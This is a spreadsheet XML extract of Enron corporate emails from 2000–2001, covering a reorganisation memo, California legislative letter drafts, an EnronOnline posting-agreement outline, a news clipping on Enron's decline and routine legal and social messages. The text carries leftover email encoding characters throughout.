addition, the Restructuring Group, currently managed by Dick Lydecker, will=_x000D_
=20_x000D_
report to Brian Redmond.  This group is currently monetizing a large portio=_x000D_
n=20_x000D_
of the merchant investment portfolio given our current strategies.  This=20_x000D_
group will have continuing responsibility to manage troubled commodity and=_x000D_
=20_x000D_
capital transactions that need considerable time and attention to manage ri=_x000D_
sk=20_x000D_
and monetize.=20_x000D_
_x000D_
In addition to these responsibilities, Brian will manage the pending sale a=_x000D_
nd=20_x000D_
transition of the HPL asset over the next couple quarters as regulatory and=_x000D_
=20_x000D_
securities approvals are obtained in order to complete the sale.  Brian wil=_x000D_
l=20_x000D_
report to the EA OOC._x000D_
_x000D_
f) Principal Investing  =01)  with the departure of Jeff Donahue to new=20_x000D_
opportunities in EBS, ENA=01,s venture capital function will be managed by=_x000D_
=20_x000D_
Michael L. Miller.  This group makes small investments in distributed=20_x000D_
generation, power quality and technology companies that can benefit from=20_x000D_
Enron=01,s distribution channels and expertise.  Michael will report to the=_x000D_
 EA=20_x000D_
OOC._x000D_
_x000D_
g) Corporate Development =01) Tim Detmering will assume the corporate=20_x000D_
development responsibilities for ENA as Jeff transitions to his new role an=_x000D_
d=20_x000D_
will report to the EA OOC._x000D_
_x000D_
h) Generation Investments =01) there will be no changes to this group manag=_x000D_
ed by=20_x000D_
Dave Duran. Dave will continue to report to the EA OOC._x000D_
_x000D_
i) Energy Capital Resources =01) there will be no changes to this group=20_x000D_
currently lead by C. John Thompson and Scott Josey.  John and Scott will=20_x000D_
continue to report to the EA OOC._x000D_
_x000D_
As a final note in the interest of keeping things simple, Enron Americas wi=_x000D_
ll=20_x000D_
have two operating divisions  - Enron North America and Enron South America=_x000D_
. =20_x000D_
As a result, we will continue to conduct business under these two operating=_x000D_
=20_x000D_
companies; therefore, eliminating the need to change legal entities et al. =_x000D_
=20_x000D_
If you are currently a commercial employee of ENA or ESA you will continue =_x000D_
to=20_x000D_
conduct business in that company.=20_x000D_
_x000D_
We look forward to another exciting year in the North American energy=20_x000D_
market.  This is certainly a company unrivaled in the marketplace with the=_x000D_
=20_x000D_
most talented employees.  The opportunities are endless.  We wish you and=_x000D_
=20_x000D_
your family a very happy and safe holiday season.</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 06:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Steve Kean</t>
  </si>
  <si>
    <t xml:space="preserve">Leslie:_x000D_
_x000D_
I checked with Steve and he would like you to revise it._x000D_
_x000D_
  Thanks,_x000D_
_x000D_
  Maureen_x000D_
_x000D_
_x000D_
_x000D_
	Leslie Lawner_x000D_
	02/12/2001 11:36 AM_x000D_
		_x000D_
		 To: Steven J Kean/NA/Enron@Enron, 'Scott Govenar'" &lt;sgovenar@govadv.com/, _x000D_
"'skean_x000D_
		 cc: _x000D_
		 Subject: RE: Steve Kean_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I agree with Mike's comments.  Do you want me to revise, or should Mike?   _x000D_
-Leslie_x000D_
_x000D_
(Harry, this is the letter that you said you would circulate)_x000D_
_x000D_
_x000D_
	Steven J Kean_x000D_
	02/11/2001 01:36 PM_x000D_
		 _x000D_
		 To: Leslie Lawner/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: RE: Steve Kean_x000D_
_x000D_
_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 02/11/2001 02:35 PM -----_x000D_
_x000D_
	MBD &lt;MDay@GMSSR.com&gt;_x000D_
	02/09/2001 03:29 PM_x000D_
		 _x000D_
		 To: "'Scott Govenar'" &lt;sgovenar@govadv.com&gt;, "'skean@enron.com'" _x000D_
&lt;skean@enron.com&gt;, "'Sandi McCubbin Enron SF'" &lt;smccubbi@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: RE: Steve Kean_x000D_
_x000D_
_x000D_
I think the letter is well organized to get our message across that a_x000D_
comprehensive solution is needed.  The only concern I have is the reference_x000D_
at the end of the first paragraph to  "the crisis grows daily with no clear_x000D_
resolution offering long term relief in sight."  In fact we do no have_x000D_
several bills on demand side management, one by Wright on accelerating_x000D_
repowering of power plants and allowing incentives for voluntary_x000D_
conservation, at least a vehicle for utility cost recovery (AB-18X), and a_x000D_
Bown bill to restore direct access rights compromised by AB-1X.  So I am_x000D_
concerned that the legislative leadership would take some umbrage at the_x000D_
notion that we dont see any of what they are doing as offering hope for a_x000D_
long term solution.  Perhaps we could rephrase it to say that the piecemeal_x000D_
elements of positive solutions that have been discussed or offered need to_x000D_
be clarified and blended into a comprehensive proposal which has the_x000D_
following elements....and then lay out our case._x000D_
_x000D_
Sandi, do you agree with my concerns?  Otherwise the elements of the letter_x000D_
are fine, and track what we are trying to draft in terms of legislative_x000D_
language.  I will break down the proposals into groups of issues for ease of_x000D_
review, even though we may later want to consoliate the entire package.  _x000D_
_x000D_
Please call if you have any more questions.  _x000D_
_x000D_
Thanks, _x000D_
Mike Day_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Scott Govenar [mailto:sgovenar@govadv.com]_x000D_
Sent: Friday, February 09, 2001 7:56 AM_x000D_
To: Mike Day_x000D_
Subject: Steve Kean_x000D_
_x000D_
_x000D_
Mike,_x000D_
_x000D_
Sandi wanted me to forward a draft letter from Steve Kean to the_x000D_
Governor and legislature for your review and comment._x000D_
_x000D_
Scott_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 May 2000 03:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EnronOnline Posting Agreement</t>
  </si>
  <si>
    <t>David;_x000D_
_x000D_
Here are our initial thoughts regarding the Posting Agreement form.  I shou=_x000D_
ld=20_x000D_
be in all day today and tomorrow.  Please feel free to call to discuss._x000D_
_x000D_
At the closing of the Transaction, the Company and Enron will enter into a=_x000D_
=20_x000D_
=01&amp;Posting Agreement=018 pursuant to which Enron will agree to post prices=_x000D_
 for=20_x000D_
certain products to the Company=01,s platform in a manner that permits the=_x000D_
=20_x000D_
Company=01,s customers to electronically attempt to transact, through the=_x000D_
=20_x000D_
Company=01,s website but on EOL=01,s database, with respect to Subject Prod=_x000D_
ucts=20_x000D_
(defined below). =20_x000D_
_x000D_
The Company will provide, at the Company=01,s expense and in accordance wit=_x000D_
h=20_x000D_
Enron=01,s specifications and technical requirements t[specifications annex=_x000D_
?],=20_x000D_
an interface which will be used by Enron to post prices for Subject Product=_x000D_
s=20_x000D_
on the Company=01,s website.  Enron will provide, at Enron=01,s expense and=_x000D_
 in=20_x000D_
accordance with Enron=01,s specifications and technical requirements [annex=_x000D_
?],=20_x000D_
an interface for the Company=01,s customers to attempt transactions (as=20_x000D_
discussed below) on the EOL database.  The parties will also establish a=20_x000D_
credit interface to facilitate Enron=01,s credit decisions with respect to=_x000D_
=20_x000D_
attempted transactions._x000D_
_x000D_
The Company=01,s customers will be permitted to attempt to transact against=_x000D_
=20_x000D_
prices posted by Enron at Enron=01,s sole discretion.  Accordingly, prices=_x000D_
=20_x000D_
posted by Enron on the Company=01,s website shall not be deemed to be offer=_x000D_
s to=20_x000D_
sell or buy, and all attempted transactions must be validated against the E=_x000D_
OL=20_x000D_
database in accordance with EOL=01,s customary operating policies and=20_x000D_
practices.  The point of contract for all transactions consummated on price=_x000D_
s=20_x000D_
that are posted by Enron shall be the EOL database, and all of such=20_x000D_
transactions will be consummated pursuant to EOL=01,s General Terms and=20_x000D_
Conditions, or the terms of a master agreement between the Company=01,s cus=_x000D_
tomer=20_x000D_
and Enron, if any.  [manner in which the Company=01,s customers will agree =_x000D_
to=20_x000D_
transact under EOL=01,s General Terms and Conditions]=20_x000D_
_x000D_
[process of and responsibility for =01&amp;mapping=018 the products offered by =_x000D_
the=20_x000D_
Company and the prices posted by Enron in order to ensure accurate matching=_x000D_
=20_x000D_
of Subject Products between the Company=01,s website and EOL=01,s database]_x000D_
_x000D_
Enron will not be required to pay to the Company any commission or other=20_x000D_
charge with respect to any transaction completed with EOL through the Compa=_x000D_
ny=01,_x000D_
s Platform.  Commissions charged to those customers completing transactions=_x000D_
=20_x000D_
with EOL shall not exceed the Company=01,s standard rates.  Each party shal=_x000D_
l be=20_x000D_
solely responsible for the costs and expenses of operating and maintaining=_x000D_
=20_x000D_
its respective platform; the Company will be responsible for all=20_x000D_
telecommunication costs and expenses from the Company=01,s website to EOL=_x000D_
=01,s=20_x000D_
website.=20_x000D_
_x000D_
Prior to Closing, the Company and Enron will agree to specific products wit=_x000D_
h=20_x000D_
respect to which Enron will post prices on the Company=01,s Platform (the=_x000D_
=20_x000D_
Subject Products=018).  Products may be added or deleted by subsequent agre=_x000D_
ement=20_x000D_
of the parties, but Enron shall have no obligation to post prices with=20_x000D_
respect to products for which it then does not post prices on EOL, or to=20_x000D_
otherwise act in a manner that is inconsistent with or contrary to its=20_x000D_
business methods, practices or policies employed on EOL._x000D_
_x000D_
[Circumstances under which the Agreement may be terminated by a party, and=_x000D_
=20_x000D_
consequences of either party=01,s breach of the Agreement]</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 03:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Eric, sorry for the delay.  It's a busy morning._x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Jun 2000 04:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Daren J Farmer/HOU/ECT on 06/05/2000 _x000D_
11:51 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Yvette G Connevey @ ENRON                           06/05/2000 11:22 AM_x000D_
	_x000D_
_x000D_
To: Ami Chokshi/Corp/Enron@ENRON, Julie Meyers/HOU/ECT@ECT, Michael _x000D_
Walters/HOU/ECT@ECT, O'Neal D Winfree/HOU/ECT@ECT, Bryan Hull/HOU/ECT@ECT, _x000D_
David Baumbach/HOU/ECT@ECT, Jody Crook/Corp/Enron@ENRON, Tom _x000D_
Acton/Corp/Enron@ENRON, Mark McCoy/Corp/Enron@Enron, Carlos J _x000D_
Rodriguez/HOU/ECT@ECT, Stella L Morris/HOU/ECT@ECT, Aimee Lannou/HOU/ECT@ECT, _x000D_
George Grant/HOU/ECT@ECT, Sabrae Zajac/HOU/ECT@ECT, Susan D _x000D_
Trevino/HOU/ECT@ECT, Robert E Lloyd/HOU/ECT@ECT, Clem Cernosek/HOU/ECT@ECT, _x000D_
Jackie Young/HOU/ECT@ECT, Charlotte Hawkins/HOU/ECT@ECT, Robert _x000D_
Cotten/HOU/ECT@ECT, Ricky Ellis/NA/Enron@Enron, Eddie Janzen/NA/Enron@Enron, _x000D_
Angelique Woods/NA/Enron@Enron_x000D_
cc: Mary Comello/Corp/Enron@Enron, Kim Weldon/Corp/Enron@Enron, Lisa _x000D_
Csikos/HOU/ECT@ECT, Daren J Farmer/HOU/ECT@ECT, Mary M Smith/HOU/ECT@ECT, _x000D_
Rita Wynne/HOU/ECT@ECT, Steve Venturatos/HOU/ECT@ECT, Pat _x000D_
Clynes/Corp/Enron@ENRON, Michael Eiben/HOU/ECT@ECT _x000D_
Subject: _x000D_
_x000D_
Kim, Mary, _x000D_
Please forward this on to your people. _x000D_
_x000D_
I hope you are ready to BOWL!!!!  Tomorrow we will meet in the lobby at 2:45 _x000D_
and begin to load our buses and depart for the bowling alley.  Their will be _x000D_
two buses departing at 2:45 and at 3:00 just to make sure we get any _x000D_
stragglers.  _x000D_
_x000D_
As soon as we arrive you will join your team members (your teams have already _x000D_
been chosen and there is no swapping, negotiating or shuffling allowed).  You _x000D_
will be notified tomorrow as we depart who is on your team and their will be _x000D_
signs at the bowling alley marking the lanes for each team. _x000D_
 _x000D_
Our plan is to bowl three games or until time allows.  At 5:30 we will gather _x000D_
for prizes and awards and depart at 6:00. _x000D_
_x000D_
Please see your admin today for your bowling shirt.  We highly encourage you _x000D_
to wear it tomorrow, either with jeans or khakis, whichever you prefer.  If _x000D_
you don't wear your shirt, you run the risk of being ridiculed by your _x000D_
co-workers, sticking out like a sore thumb when you bowl, or being left out _x000D_
of any future reindeer games (just teasing)._x000D_
_x000D_
If you have any questions please see your admin. _x000D_
_x000D_
Thank you!_x000D_
Yvette_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Jun 2000 09:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'welcome-mail1@amazon.com'})</t>
  </si>
  <si>
    <t>Welcome to Amazon.com</t>
  </si>
  <si>
    <t xml:space="preserve">[IMAGE]  _x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
Dear Amazon Customer, _x000D_
_x000D_
A  little bird told us you just placed your first order at  Amazon.com.  _x000D_
(Actually it was an ultrasecure, heavily guarded computer  system--but  the _x000D_
bird sounds friendlier.) At any rate, I'd like to take  this  opportunity to _x000D_
welcome you to Amazon.com and introduce you to  some  fun, free services _x000D_
every Amazon shopper should know about._x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
First off, sign  up for Delivers. Our expert editors will send you  _x000D_
information-packed  e-mails about the topics that interest you most. Choose  _x000D_
from  over 100 subjects--from DVD New Releases and Mystery  Books  to Bargain _x000D_
Music and Children's Software._x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
Next, are there authors you adore, musicians you admire,  actors  or _x000D_
directors you absolutely love? Then sign up for Amazon.com  Alerts. We'll _x000D_
send you an e-mail to let you know  when  a new release from that person _x000D_
first becomes  available._x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
Last order of business--send  an e-Card. It's a fun way to keep in touch _x000D_
with  friends.  Our wacky e-Card creative team has come up with clever  _x000D_
greetings  for every occasion under the sun. When they run out of  holidays,  _x000D_
they create their own--such as Bad Hair Day._x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
That's  it. Thanks again for shopping at Amazon.com. We hope you'll  stop  in _x000D_
again soon and put these special services to work for  you.  _x000D_
_x000D_
  Sincerely,_x000D_
[IMAGE]_x000D_
Jennifer  Cast _x000D_
General Manager and Avid Amazon Shopper _x000D_
_x000D_
We  hope you enjoyed receiving this message._x000D_
[IMAGE]Want  to adjust your e-mail preferences? Click  here_x000D_
[IMAGE]Prefer  not to receive these e-mails? Click  here _x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
   </t>
  </si>
  <si>
    <t>Thu, 22 Feb 2001 05:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>email for Michael Brown and Janelle Scheuer</t>
  </si>
  <si>
    <t>Here's the CA you requested._x000D_
_x000D_
_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Sat, 18 Aug 2001 18:19:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'kal.shah@enron.com'})</t>
  </si>
  <si>
    <t>Enron offline.</t>
  </si>
  <si>
    <t>FYI - The pun above refers to the small down-time we had a few days ago and talks about that being one of the proofs that things are not well at Enron....  Great time to take pot shots at everything we do for these guys!_x000D_
_x000D_
-----Original Message-----_x000D_
From: djcustomclips@djinteractive.com_x000D_
[mailto:djcustomclips@djinteractive.com]_x000D_
Sent: Friday, August 17, 2001 3:59 PM_x000D_
To: 168842@mailman.enron.com_x000D_
Subject: Rahil Jafry: Enron offline._x000D_
_x000D_
_x000D_
Enron offline._x000D_
_x000D_
08/17/2001_x000D_
Energy Compass_x000D_
(c) 2001 Energy Intelligence Group. All rights reserved_x000D_
_x000D_
Enron CEO Jeff Skilling quit this week at a time when the company has problems_x000D_
in almost every geographic region and business sector in which it operates._x000D_
_x000D_
Its once-vaunted broadband business is in the dumps, and the Dabhol power_x000D_
project, at one time the prize example of foreign investment in India, has_x000D_
turned into a debacle (EC Jul.13,p4). The company recently withdrew_x000D_
mysteriously from two high-profile Middle East gas ventures, including a stake_x000D_
in one of three Saudi projects (EC Jun.15,p5). Just last week, an explosion_x000D_
took down its Teeside power plant in the UK, killing three workers (EC_x000D_
Aug.10,p9), and its internet-based trading service, EnronOnline, suffered a_x000D_
morning-long outage. California has issued virtual "wanted posters" for the_x000D_
company and its execs for allegedly causing the state's electricity crisis._x000D_
The stock has tracked the downfall. Just a year ago, Enron was trading at more_x000D_
than $90/share. It was recently hovering around $42, and has dropped since_x000D_
Skilling's announcement below $40. Not even the 22nd consecutive quarter of_x000D_
record earnings, issued last month, helped. Sharks could now start circling_x000D_
the waters. Several years ago, Royal Dutch/Shell made overtures, apparently_x000D_
drawn by access to Enron's massive North American gas and power marketing_x000D_
business and gas pipeline system. When nothing came of the talks, Shell bought_x000D_
Tejas Energy. The Shell rumors have now resurfaced - and Enron investors might_x000D_
be prepared to listen this time round._x000D_
_x000D_
Although the stock price decline began on the watch of once and again chief_x000D_
executive Ken Lay, it accelerated once Skilling assumed the post in February_x000D_
as Lay headed to Washington to become part of President George W. Bush's_x000D_
unofficial advisory team. Skilling's move also coincided with the overall_x000D_
slide in all tech stocks, but termination of a highly touted broadband_x000D_
partnership with Blockbuster Video accelerated the decline._x000D_
_x000D_
Though Skilling says he left for personal reasons, reports that some board_x000D_
members were unhappy with his performance had been circulating for weeks. Nor_x000D_
is Skilling the only one to jump Enron's troubled ship. Rebecca Mark, once_x000D_
viewed as a possible rival to Skilling, "resigned" last summer because of the_x000D_
poor performance of Enron's Azurix water business. Joe Sutton, who headed_x000D_
Enron's international business, left last autumn over a difference in_x000D_
strategy. Sutton supported investments in hard assets, while Enron's business_x000D_
model now is "asset light." More recently, vice chairman Cliff Baxter and Lou_x000D_
Pai, who headed the retail energy unit, have departed, and Ken Rice, once the_x000D_
golden boy of broadband, is reportedly leaving._x000D_
_x000D_
Lay assured analysts after Skilling's announcement that Enron would continue_x000D_
the strategy of building up its trading operations and operating with a_x000D_
minimum of assets. Based on the past year's stock performance, it might be_x000D_
better to head in another direction._x000D_
_x000D_
_x000D_
_x000D_
Folder Name: Rahil Jafry_x000D_
Relevance Score on Scale of 100: 82_x000D_
_x000D_
_______________________________________________________________________x000D_
_x000D_
To review or revise your folder, visit http://www.djinteractive.com or contact Dow Jones Customer Service by e-mail at custom.news@bis.dowjones.com or by phone at 800-369-7466. (Outside the U.S. and Canada, call 609-452-1511 or contact your local sales representative.)_x000D_
_______________________________________________________________________x000D_
_x000D_
Copyright (c) 2001 Dow Jones &amp; Company, Inc. All Rights Reserved</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 05:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Northwestern</t>
  </si>
  <si>
    <t xml:space="preserve">I say go ahead with the call to work through any nits etc.  We will need a _x000D_
follow up call anyway, once we know what to do to meet the accting _x000D_
objectives.  This means you won't be available at 200 to talk with the accts, _x000D_
but that's ok.  _x000D_
_x000D_
Finalizing the extension sounds good to me._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Keffer, John" &lt;JKeffer@KSLAW.com&gt; on 04/17/2001 11:24:51 AM_x000D_
To: "'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;, "Keffer, John" _x000D_
&lt;JKeffer@KSLAW.com&gt;_x000D_
cc: "Reuter, Marisa" &lt;MReuter@KSLAW.com&gt; _x000D_
_x000D_
Subject: RE: Northwestern_x000D_
_x000D_
Do you want me to postpone the call (I expect they are flexible)?.  Do you_x000D_
want me to listen in on the meeting with the accountants?_x000D_
_x000D_
Do you want me to communicate with Marguerite to get the extension in shape_x000D_
for signing?_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Tuesday, April 17, 2001 11:23 AM_x000D_
To: Keffer, John_x000D_
Cc: Reuter, Marisa_x000D_
Subject: RE: Northwestern_x000D_
_x000D_
_x000D_
_x000D_
Ben is ok with the extension._x000D_
_x000D_
Ben and I have a meeting with the accountants at 200 (just got scheduled -_x000D_
got to take the apptment when we can).  I'm happy for you guys to go_x000D_
forward with the call. Ben and I will join later if we finish in time._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Keffer, John" &lt;JKeffer@KSLAW.com&gt; on 04/16/2001 06:17:32 PM_x000D_
_x000D_
To:   "'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;, "Reuter, Marisa"_x000D_
      &lt;MReuter@KSLAW.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  RE: Northwestern_x000D_
_x000D_
I've talked to Marguerite.  She agreed to a call tomorrow at 2 PM central._x000D_
She is sending to you and me a draft of an extension.  No need to do_x000D_
anything with it tonight, but I suspect that Mike will begin calling Ben_x000D_
about it in the morning._x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Monday, April 16, 2001 6:12 PM_x000D_
To: mreuter@kslaw.com; jkeffer@kslaw.com_x000D_
Subject: Northwestern_x000D_
_x000D_
_x000D_
Hi there,_x000D_
_x000D_
I am meeting with Ben tomorrow to discuss NWestern.  I'm fairly confident_x000D_
that he will be willing to extend the letter agreement, but he hasn't_x000D_
called me back today to confirm._x000D_
_x000D_
Ms. Kahn and I have exchanged voice mail.  Could one of you return her call_x000D_
for me?  I'm tied up.  You might get an idea on some times tomorrow for a_x000D_
call.  I'm booked until around 130 for anything which would last more than_x000D_
a few minutes.  I'll check with Ben._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    Confidentiality Notice_x000D_
This message is being sent by or on behalf of a lawyer.  It is intended_x000D_
exclusively for the individual or entity to which it is addressed.  This_x000D_
communication may contain information that is proprietary, privileged or_x000D_
confidential or otherwise legally exempt from disclosure.  If you are not_x000D_
the named addressee, you are not authorized to read, print, retain, copy or_x000D_
disseminate this message or any part of it.  If you have received this_x000D_
message in error, please notify the sender immediately by e-mail and delete_x000D_
all copies of the message._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
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_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Jul 2001 03:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ath@cpuc.ca.gov', 'drothrock@cmta.net', 'jim@resources.ca.gov', 'john.rozsa@sen.ca.gov', 'jordan@cmua.org', 'anw@cpuc.ca.gov', 'wbooth@booth-law.com', 'jmball@ns.net', 'egarcia@ka-pow.com', 'charles.bacchi@asm.ca.gov', 'gronijn@texaco.com', 'alippin@mail.arco.com', 'fosterrg@sce.com', 'johnf@ncpa.com', 'brbarkovich@earthlink.net', 'hacknece@sce.com', 'dcazalet@apx.com', 'fieldejr@sce.com', 'vjw@cleanpower.org', 'jalamo@enron.com', 'jackson_gualco@gualcogroup.com', 'cmcintyre@sempra.com', 'cra@calretailers.com', 'bzobel@mail.arco.com', 'jeanne.cain@calchamber.com', 'bridgesj@epenergy.com', 'moravekj@sce.com', 'dominic.dimare@calchamber.com', 'jstewart@cmta.net', 'jwright@smithandkempton.com', 'gheath@eob.ca.gov', 'chowell@sempra.com', 'smutny@iepa.com', 'brownc@epenergy.com', 'houstgrp@pacbell.net', 'ek@a-klaw.com', 'dcarroll@dbsr.com', 'joseph.lyons@asm.ca.gov', 'fore.delbert@epenergy.com', 'kelly.boyd@asm.ca.gov', 'ed@clfp.com', 'john.g.larrea@williams.com', 'anna.ferrera@sen.ca.gov', 'cohnap@sce.com', 'athomas@newenergy.com', 'jdasovic@enron.com', 'dsam@chevron.com', 'wkeese@energy.state.ca.us', 'debinorton@aol.com', 'joer@calpine.com', 'brian.kelly@sen.ca.gov', 'hardygl@texaco.com', 'jackflanigan@flaniganlaw.com'})</t>
  </si>
  <si>
    <t>MEETING NOTICE</t>
  </si>
  <si>
    <t>Folks-_x000D_
We will be having a meeting of the CA Energy Solutions Group on_x000D_
_x000D_
Wednesday August 15, 2001_x000D_
9:30 am to 3:00 pm_x000D_
California Farm Bureau_x000D_
2300 River Plaza Drive_x000D_
_x000D_
DJ and I will be working on an agenda in the coming days. Please let us know_x000D_
if there is something specific you would like to cover or if the 15th_x000D_
appears to be a bad date._x000D_
_x000D_
Thanks much,_x000D_
Delaney_x000D_
_x000D_
P.S. Also be thinking of where you like to have the Annual Retreat -- should_x000D_
we stick with Yountville or try somewhere new?</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 08:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Salmon Energy: Consent and Assignment Agreement</t>
  </si>
  <si>
    <t>Thanks,  I'll pass along  your comments._x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Thu, 22 Jun 2000 04:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Exempt Market Declaration - Australia</t>
  </si>
  <si>
    <t xml:space="preserve">David - Please don't give them info on EEFT's capital concerns as this is _x000D_
very sensitive and the regulators communicate!  Thanks - Paul_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
David Minns@ENRON_DEVELOPMENT_x000D_
22/06/2000 06:36_x000D_
To: Alan Aronowitz@ECT, Paul Simons@ECT, Mark Taylor@ECT_x000D_
cc: Paul Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Exempt Market Declaration - Australia_x000D_
_x000D_
Today I called spoke to the Jillian Segall National Commissioner of the _x000D_
Australian Securities and Investments Commission (ASIC). In brief I have _x000D_
arranged a meeting  with her and staff handling our application next _x000D_
Wednesday afternoon. Paul I have foreshadowed that we would be willing _x000D_
withdraw and resubmitt our application as they had indicated. Howver we would _x000D_
like to meet them to explain directly to them what our position is   _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Re: deal 581149.01</t>
  </si>
  <si>
    <t xml:space="preserve">Mark is changing this right now._x000D_
_x000D_
_x000D_
Stephanie Piwetz   04/13/2001 09:01 AM_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: deal 581149.01_x000D_
_x000D_
Kate, Fischer deal , apb says dp should be 4 Corners 345kv_x000D_
THanks_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 12:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'wjsymes@home.com'})</t>
  </si>
  <si>
    <t>Love In Concert - from Dad</t>
  </si>
  <si>
    <t>Hello! Dad has just sent you a greeting card from Bluemountain.com._x000D_
_x000D_
You can pick up your personal message here:_x000D_
_x000D_
http://www1.bluemountain.com/cards/boxa224253m4/2b7eb7dcdzrtvj.html_x000D_
_x000D_
Your card will be available for the next 90 days_x000D_
_x000D_
_x000D_
This service is 100% FREE! :) Have a good day and have fun!_x000D_
_x000D_
_________________________________________________________________________x000D_
Accessing your card indicates agreement with Blue Mountain's Website Rules:_x000D_
http://www.bluemountain.com/home/WebsiteRules.html_x000D_
_x000D_
Send FREE Blue Mountain cards to friends and family (and attach gifts too!)_x000D_
http://www.bluemountain.com</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 09:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Please advise on  response to below._x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490_x000D_
_x000D_
----- Forwarded by Debra Perlingiere/HOU/ECT on 04/24/2001 04:28 PM -----_x000D_
_x000D_
	PayneM@pioneernrc.com_x000D_
	04/23/2001 10:56 AM_x000D_
		 _x000D_
		 To: Debra.Perlingiere@enron.com_x000D_
		 cc: _x000D_
		 Subject: RE: GISB_x000D_
_x000D_
_x000D_
Is ENA Upstream Company, LLC a subsidiary or Enron or is it a stand alone_x000D_
entity?_x000D_
Marilynn Payne_x000D_
Marketing Department_x000D_
Paynem@pioneernrc.com &lt;mailto:Paynem@pioneernrc.com&gt;_x000D_
972-969-3866_x000D_
972-969-3574 (fax)_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
 From: Debra.Perlingiere@enron.com_x000D_
[SMTP:Debra.Perlingiere@enron.com]_x000D_
 Sent: Thursday, April 19, 2001 10:07 AM_x000D_
 To: PayneM@pioneernrc.com_x000D_
 Subject: RE: GISB_x000D_
_x000D_
_x000D_
 Marilyn,_x000D_
_x000D_
 Attached is a final version of the GISB with revision to Special_x000D_
Provisions_x000D_
 regarding purposed tax language.   If you are in agreement with the_x000D_
final_x000D_
 version,  please proceed with execution of same._x000D_
_x000D_
 Please give me a call with any questions and or comments you may_x000D_
have_x000D_
 regarding the enclosed._x000D_
                (See attached file: Pioneer  Natural  Resources (GISB_x000D_
ENA_x000D_
 Upstream).doc)_x000D_
_x000D_
 Best regards,_x000D_
 Debra Perlingiere_x000D_
 Enron North America Corp._x000D_
 Legal Department_x000D_
 1400 Smith Street, EB 3885_x000D_
 Houston, Texas 77002_x000D_
 dperlin@enron.com_x000D_
 Phone 713-853-7658_x000D_
 Fax  713-646-3490 &lt;&lt; File: Pioneer  Natural  Resources (GISB ENA_x000D_
Upstream).doc &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 14:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FYI: ECCL ISDA negotiations</t>
  </si>
  <si>
    <t xml:space="preserve">Tana,_x000D_
